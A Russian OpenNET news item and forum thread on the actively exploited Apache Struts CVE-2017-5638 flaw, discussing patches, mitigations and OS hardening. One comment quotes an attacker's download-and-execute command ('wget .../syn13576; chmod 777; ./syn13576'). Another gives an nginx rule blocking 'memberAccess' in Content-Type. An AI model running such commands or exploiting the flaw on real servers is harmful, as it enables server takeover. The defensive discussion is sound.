The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  правила/FAQ  поиск  регистрация  вход/выход  слежка  RSS
"Волна взломов сайтов через неисправленную уязвимость в Apach..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от opennews (??) on 09-Мрт-17, 11:47 
Опубликовано (http://struts.apache.org/announce.html#a20170307) экстренное обновление web-фреймворка Apache Struts (2.3.32 и 2.5.10.1), применяемого для создания web-приложений на языке Java с использованием парадигмы Model-View-Controller. В новых выпусках устранена критическая 0-day уязвимость (https://cwiki.apache.org/confluence/display/WW/S2-045) (CVE-2017-5638 (https://security-tracker.debian.org/tracker/CVE-2017-5638)),  которая уже несколько дней используется (http://blog.talosintelligence.com/2017/03/apache-0-day-explo...) злоумышленниками для получения контроля за сайтами, работающими под управлением Apache Struts.


Уязвимость позволяет выполнить произвольный код на сервере, отправив запрос со специально оформленным содержимым HTTP-заголовка "Content-Type". Проблема проявляется в выпусках Struts с 2.3.5 по 2.3.31 и с  2.5.0 по 2.5.10, и вызвана ошибкой в коде Multipart parser, применяемом для разбора запросов, состоящих из нескольких частей (multipart/form-data). В случае, если заголовок Content-Type содержит некорректное значение, срабатывает исключение  для отображения сообщения об ошибке, которое, если в тексте присутствует маска "multipart/form-data", также приводит к вызову обработчика Multipart parser и выполнению произвольного кода.


Так как в открытом доступе опубликован готовый эксплоит (https://github.com/rapid7/metasploit-framework/issues/8064) и в сети уже зафиксирована автоматизированная вредоносная активность, эксплуатирующая данную уязвимость, всем пользователям  Apache Struts рекомендуется в экстренном порядке выполнить обновление или блокировать работу компонента Jakarta Multipart parser. Обновления пакетов с libstruts уже выпущено для Debian (https://security-tracker.debian.org/tracker/CVE-2017-5638). В Ubuntu проблема остаётся неисправленной. В штатных репозиториях RHEL/Cent OS пакет Apache Struts не поставляется.

В случае если web-приложение выполняется в контейнере Apache Tomcat, выполняемом (https://wiki.apache.org/tomcat/HowTo#How_to_run_Tomcat_witho...) с правами root, в результате атаки сразу может быть получен root-доступ к системе. Например, фиксируемые в логах попытки атак выполняют отключение пакетного фильтра и устанавливают бэкдор для удалённого управления системой или типовое вредоносное ПО:

URL: http://blog.talosintelligence.com/2017/03/apache-0-day-explo...
Новость: http://www.opennet.me/opennews/art.shtml?num=46167

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +1 +/
Сообщение от Аноним (??) on 09-Мрт-17, 11:47 
Стратс уже сто лет в полусдохшем состоянии и никому не нужен.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +19 +/
Сообщение от Аанон on 09-Мрт-17, 11:49 
Никому, кроме всех тех, кому он нужен.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

4. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +8 +/
Сообщение от Аноним (??) on 09-Мрт-17, 11:56 
С учётом того, что сайты на Java+Struts очень любят делать банки и госучреждения (умолчим про gosuslugi.ru) последствия этой дыры могут быть даже серьёзнее, чем кажется.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

37. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от лютый жабист__ on 10-Мрт-17, 05:43 
Если госуслуги на струтсе сделаны и можно было тихой сапой слить базу ПФР+ИНН+ФИО+ДР+все объекты налогообложения _в масштабах страны_, я категорически не понимаю кульхацкеров, которые слили возможность и запалили такую дыру на то, чтобы овнить какую-то никому ненужную шелупонь.

Про банки молчу, там ещё легче монетизировать дырку.

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

5. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +7 +/
Сообщение от Аноним (??) on 09-Мрт-17, 12:11 
Если у вас томкат за нжинксом, можете быстро сделать:

if ($http_content_type ~ memberAccess) {
    return 403;
}

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

29. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –7 +/
Сообщение от Alex (??) on 09-Мрт-17, 22:15 
что за блин нжинкс, энжин-экс (engine x)
Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

36. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от incker on 10-Мрт-17, 03:29 
x - икс так оно читается на русском
x - экс так оно читается на английском
Так что пофигу
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

6. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от Michael Shigorin email(ok) on 09-Мрт-17, 12:13 
Интересно, успел ли кто эту беду сбэкпортировать в EOL'нутый 1.3.10, который по всем https://pkgs.org/download/struts ...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

12. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +4 +/
Сообщение от iZEN email(ok) on 09-Мрт-17, 13:26 
Судя по командам, эксплуатируемым эксплоитами, все они предназначены для управления дистрибутивами линуксов, но не FreeBSD.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

14. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +2 +/
Сообщение от Аноним (??) on 09-Мрт-17, 13:38 
> Судя по командам, эксплуатируемым эксплоитами, все они предназначены для управления дистрибутивами
> линуксов, но не FreeBSD.

Что лишний раз подтверждает большую распространённость FreeBSD на серверах.


Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

22. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +13 +/
Сообщение от Аноним (??) on 09-Мрт-17, 15:43 
> Что лишний раз подтверждает большую распространённость FreeBSD на серверах.

Вот и гордые надуватели щёчек набежали.
Может, все дело в том, что бздюки, в отличие от некоторых излишне пафосных лапчатых, слышали о нормальных дефолтах и у них есть такие замечательные штуки, как монтирование с nonexec?
https://www.freebsd.org/cgi/man.cgi?mount(8)
Так что


cd /tmp; wget .../syn13576;chmod 777 syn13576;./syn13576

можно делать хоть до посинения.
А еще, для апачей и прочих дыроколов есть такая вещь, как клетки. Это типа контейнера, только без той кучи дыр и оговорок, что "контейнеры вообще-то не для безопасности!".
Так что обтек… завидуйте молча.
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

24. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +8 +/
Сообщение от Sw00p aka Jerom on 09-Мрт-17, 16:13 
В клетках практически всё под ro, а для нужд ПО рабочую директорию под nonexec,nosymfollow и тд, не говоря уже об урезанном мире самой клетки.
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

31. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –2 +/
Сообщение от Аноним (??) on 09-Мрт-17, 23:25 
А в линуксе конечно же не монтирования с noexec. Пиши есчо, непафосный ты наш.
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

53. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +5 +/
Сообщение от Аноним (??) on 10-Мрт-17, 15:08 
> А в линуксе конечно же не монтирования с noexec.

Судя по эксплойту, нет. Или как с тем же grsecurity, все есть, но никто не пользуется.


Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

35. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –2 +/
Сообщение от Аноним (??) on 10-Мрт-17, 02:09 
VNET уже перестал ядро ронять, м? Или всё по старинке - на алиасах костыляете?
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

56. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +2 +/
Сообщение от Аноним (??) on 10-Мрт-17, 15:27 
> VNET уже перестал ядро ронять, м?

Если отвлечся от откровенного спрыгивания с темы, все равно остается вопрос:
и как там, в криокамере?

Кстати, вы бы поинтересовались, что такое VNET. А то "ядерная фича могла уронить ядро, фи!" звучит несколько фанатично. Микроядра только недавно обсуждались.


Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

40. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –4 +/
Сообщение от Аноним (??) on 10-Мрт-17, 08:30 
Представляешь в моём дистрибутиве не только с noexec монтируется всё левое, но ещё и с nodev, и ro. Здорово, правда?!
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

52. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +3 +/
Сообщение от Аноним (??) on 10-Мрт-17, 15:02 
> Представляешь в моём дистрибутиве не только с noexec монтируется всё левое, но
> ещё и с nodev, и ro. Здорово, правда?!

nodev? Зачем он нужен? Хотя чего это я, до лапчтатых ведь иногда как до жирафов.
ro для /tmp?
Верю!


Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

55. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –3 +/
Сообщение от Аноним (??) on 10-Мрт-17, 15:22 
> nodev? Зачем он нужен?

Прелестно, вот такие вот "специалисты" бздю и лепят.

Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору

57. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +3 +/
Сообщение от Аноним (??) on 10-Мрт-17, 15:39 
>> nodev? Зачем он нужен?
> Прелестно, вот такие вот "специалисты" бздю и лепят.

Вот такие как вы "специалисты" не знают, но имеют ценное мнение оюо всем на свете.

> Author: rodrigc <rodrigc@FreeBSD.org>
> Date:   Tue Nov 29 19:13:28 2005 +0000
> Document removal of nodev mount option.
> Requested by:   gleb

Но вы держитесь. За Ядро, Линуса и Родной Дистрибутив и все такое (иначе не объяснить, почему некоторые при отсутсвии представления о чем-то, упорно лезут это что-то критиковать).

Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

61. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –2 +/
Сообщение от Аноним (??) on 11-Мрт-17, 18:03 
Ну то есть зачем нужен nodev вы по прежнему не знаете ?
Ответить | Правка | ^ к родителю #57 | Наверх | Cообщить модератору

62. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +1 +/
Сообщение от Аноним (??) on 11-Мрт-17, 19:01 
> Ну то есть зачем нужен nodev вы по прежнему не знаете ?

Опять по себе судите? Разрешаю посмотреть в ман.
https://linux.die.net/man/8/mount
Заодно:
http://www.google.com/search?q=зачем+нужны+запятые

После этого, можете попытаться объяснить, зачем на бзд нужен nodev. И что там с ro /tmp.

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

48. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +2 +/
Сообщение от Michael Shigorin email(ok) on 10-Мрт-17, 12:18 
> монтирование с nonexec?

Только не говорите мне, что такие очепятки врастают в пальцы тех, кто на самом деле применяет -o noexec.

Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

54. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +2 +/
Сообщение от Аноним (??) on 10-Мрт-17, 15:21 
>> монтирование с nonexec?
> Только не говорите мне, что такие очепятки врастают в пальцы тех, кто
> на самом деле применяет -o noexec.

Хорошо, не скажу. Еще не скажу ничего о fstab.
Потому как, если уж кому-то хочется докопаться, то причина всегда найдется.
На опеннете, как всегда, достаточно классического «почему без шапки» -- «почему не пингвин?!»

24й комментарий:
> Сообщение от Sw00p aka Jerom on 09-Мрт-17, 16:13
> а для нужд ПО рабочую директорию под nonexec,nosymfollow

Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

58. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +1 +/
Сообщение от Michael Shigorin email(ok) on 10-Мрт-17, 17:17 
>>> монтирование с nonexec?
>> Только не говорите мне, что такие очепятки врастают в пальцы тех, кто
>> на самом деле применяет -o noexec.
> Хорошо, не скажу. Еще не скажу ничего о fstab.

Туда пишут или скрипты, или те, кто буковки умеет нажимать правильно.

> Потому как, если уж кому-то хочется докопаться, то причина всегда найдется.

Дружески предлагаю Вам начать с себя -- возможно, поймёте, что насмешку получили в ответ на попытку выпендриться. :)

Ответить | Правка | ^ к родителю #54 | Наверх | Cообщить модератору

67. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от пох on 17-Мрт-17, 16:06 
> Может, все дело в том, что бздюки, в отличие от некоторых излишне пафосных лапчатых,
> слышали о нормальных дефолтах

о нормальных они сроду не слышали - начиная от попыток автоматического сетапа в XXI веке создавать /tmp на физическом диске (или в виде zfs volume), и заканчивая ненужными  для tmp softupdates, если все же заставить его создавать md, но специальным ключом вручную не озаботиться (и да, там у нас ufs, потому что попытки сделать "чистую" memory-backed fs разбились о неосиляторство - оно даже есть, но ухитряется работать хуже ufs over md)

> и у них есть такие замечательные штуки, как монтирование с nonexec?

/tmp с noexec ? Поздравляю, ты сломал плагины mc, и, вероятно, не только их.

линукс, кстати (кроме того самого mc) noexec в /tmp пережил бы, но у него есть (отдельный) /var/tmp, где вполне себе создаются и исполняются в процессе нормальной работы файлы.
Начиная от пост и пре-инсталл скриптов в rpm. А, в недоделке по имени pkg до сих пор ничего подобного ниасилено? (угадайте, куда в результате пихают то, что нужно делать один раз при установке пакета?)

Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

71. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от Аноним (??) on 13-Сен-17, 20:52 
> пафосных лапчатых, слышали о нормальных дефолтах и у них есть такие
> замечательные штуки, как монтирование с nonexec?

Они и у лапчатых есть, о непафосный. А ты уверен что яве вообще есть какое-то дело до всего этого? Может ей достаточно лишь прав на чтение файла, она же код сама генерит а система вообще не в курсе что этот читаемый файл будет еще и исполняться потом.

Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

16. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +6 +/
Сообщение от Аноним (??) on 09-Мрт-17, 14:17 
Но ведь на жаве, это главное, разве нет?
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

64. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от Некулхацкер on 14-Мрт-17, 18:16 
Они для случаев, когда среду разворачивали как попало. Не скажу, что это редкое явление.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

66. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от Некулхацкер on 16-Мрт-17, 18:46 
Оригинальный взгляд на проблему. Очень. Что помешает запустить под фрёй контейнер от рута? Есть какой специальный "дух здравого смысла"? Демон здравого смысла, если винрарно.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

17. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от Аноним (??) on 09-Мрт-17, 15:03 
Сбер напрягся.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

23. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от Анон2 on 09-Мрт-17, 16:09 
Сбер в пятницу чуть у матери 27к кому-то не перевел. Но в сбере всем как бы ложить.
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

25. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от Аноним (??) on 09-Мрт-17, 17:47 
У Сбера блокчейн, не трогайте его.
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

26. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –1 +/
Сообщение от Гостище on 09-Мрт-17, 18:22 
У кого-то в сбере блокчейн. В академических целях, не коммерческих.
У остальных в сбере низзя - а то посодють.
Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

30. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +1 +/
Сообщение от Аноним (??) on 09-Мрт-17, 22:30 
Java же безопасный язык, это не C! Как такое возможно?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

39. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от Геймер on 10-Мрт-17, 08:06 
Дыра во фреймворке, виновата Java. Логичный Вы наш!
Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

42. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от Аноним (??) on 10-Мрт-17, 10:41 
А что, Oracle уже совсем Java от блобов избавил?
Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

43. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –1 +/
Сообщение от Геймер on 10-Мрт-17, 11:00 
А что, новость уже не читаем?
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

49. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от J.L. on 10-Мрт-17, 12:46 
> А что, Oracle уже совсем Java от блобов избавил?

у вас сильно не актуальные сведения http://stackoverflow.com/questions/25936712/what-is-the-diff...

Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

50. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от Michael Shigorin email(ok) on 10-Мрт-17, 13:01 
> А что, Oracle уже совсем Java от блобов избавил?

Скорее от разработчиков...

Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

44. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –1 +/
Сообщение от Аноним (??) on 10-Мрт-17, 11:12 
> Дыра во фреймворке, виновата Java. Логичный Вы наш!

Java - виртуальная машина. Следовательно дырка в Java, если можно исполнить код вне виртуальной машины.

Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

45. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +2 +/
Сообщение от Аанон on 10-Мрт-17, 11:38 
ШОК!!! Обнаружена критическая уязвимость в java.lang.Runtime. Существующий в нем метод exec позволяет выполнить любой код вне виртуальной машины.

https://docs.oracle.com/javase/8/docs/api/java/lang/Runtime....-

Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

46. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –1 +/
Сообщение от Аноним (??) on 10-Мрт-17, 11:47 
> ШОК!!! Обнаружена критическая уязвимость в java.lang.Runtime. Существующий в нем метод
> exec позволяет выполнить любой код вне виртуальной машины.
> https://docs.oracle.com/javase/8/docs/api/java/lang/Runtime....-

Оно в отдельном потоке в java машине всё-равно выполняется.

Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

47. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от Аанон on 10-Мрт-17, 12:08 
Тогда и оригинальная уязвимость - это вовсе не уязвимость, т. к. "в отдельном потоке в java машине всё-равно выполняется".
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

59. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –1 +/
Сообщение от iZEN (ok) on 10-Мрт-17, 23:03 
>> Дыра во фреймворке, виновата Java. Логичный Вы наш!
> Java - виртуальная машина. Следовательно дырка в Java, если можно исполнить код
> вне виртуальной машины.

Это всё С++. На нём написали JVM.


Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

32. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –1 +/
Сообщение от Аноним (??) on 09-Мрт-17, 23:25 
> chmod 777 2020

...
> chmod 777 syn13576

Никогда не мог понять сакральный смысл трех семёрок.

Вот почему не 'chmod 111', 'chmod 555' или 'chmod 7777'?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

33. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от tonys email(??) on 09-Мрт-17, 23:31 
Потому что 7 это 1+2+4
Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

34. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +2 +/
Сообщение от Аноним (??) on 10-Мрт-17, 00:41 
Ну ты чего уж. Три семерки. А везде, по всему Союзу три семерки, понимаешь?
Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

38. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –1 +/
Сообщение от Аноним (??) on 10-Мрт-17, 05:51 
Сакральный смысл – в портвейне "Три семёрки", он же "Три топора".

Видимо, в том, что три "7" набрать удобнее, чем, например, "755" или "700", а "555" не используют потому, что файл нередко приходится редактировать и запускать несколько раз. Вторая причина – если это сервер, который взламывают, то там нет смысла давать меньше прав для "group" и "other".

Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

41. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от Аноним (??) on 10-Мрт-17, 08:36 
> Никогда не мог понять сакральный смысл трех семёрок.

Во имя Сатаны же, ну.

Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

51. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от виндотролль (ok) on 10-Мрт-17, 14:02 
иди потаскай окошки по экрану
Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

68. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –1 +/
Сообщение от пох on 17-Мрт-17, 16:12 
> Никогда не мог понять сакральный смысл трех семёрок.

так проще, и оно работает - в отличие от твоих поделок
> Вот почему не 'chmod 111', 'chmod 555' или 'chmod 7777'?

первое ломает скритовые языки, второе мешает самому же туда записать не от рута, третье в случае скрипта вызовет весьма вероятные сообщения интерпретатора о попытке сделать суидный скрипт вместо исполнения, при том что оба осташихся бита нафиг не нужны

Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

60. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от Аноним (??) on 11-Мрт-17, 00:28 
>В случае если web-приложение выполняется в контейнере Apache Tomcat, запускаемом с правами root, в результате атаки сразу может быть получен root-доступ к системе.

Веб-приложения с правами рута? Совсем поехавшие?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

65. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  +/
Сообщение от Некулхацкер on 14-Мрт-17, 18:19 
>>В случае если web-приложение выполняется в контейнере Apache Tomcat, запускаемом с правами root, в результате атаки сразу может быть получен root-доступ к системе.
> Веб-приложения с правами рута? Совсем поехавшие?

Ну ведь под рутом проще ))))

Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору

63. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –2 +/
Сообщение от Некулхацкер on 14-Мрт-17, 18:11 
Не очень понимаю, что может дать возможность выполнить некий код с правами запустившего контейнер. Чаще всего контейнер запускают от пользователя, для которого и командного интерпретатора нет. Если же контейнер запускают из под root-а -- ну такое ничем не лечится.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

69. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –1 +/
Сообщение от пох on 17-Мрт-17, 16:17 
> Не очень понимаю, что может дать возможность выполнить некий код с правами
> запустившего контейнер. Чаще всего контейнер запускают от пользователя,

которого зовут root.

> командного интерпретатора нет. Если же контейнер запускают из под root-а --
> ну такое ничем не лечится.

почитайте внимательно, через какую задницу предлагается запускать томкэт его разработчиками, чтобы было "не от рута". Ссылка на документацию - прямо в новости.

Не говоря уже о том, что на сервере, где работает томкэт, все ваши сенситивные данные, внезапно, доступны именно томэкту. А сам сервер по большому счету нахрен никому и не нужен.

Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

70. "Волна взломов сайтов через неисправленную уязвимость в Apach..."  –1 +/
Сообщение от Кэп on 19-Мрт-17, 16:02 
Э, как-бы, Томкэт запустить не от рута нет никакой проблемы. Вообще. Тем более Гласфиш или ЖБосс. После этого любые подобные уловки, насколько я понимаю, не дадут ничего вообще.
Ответить | Правка | ^ к родителю #69 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру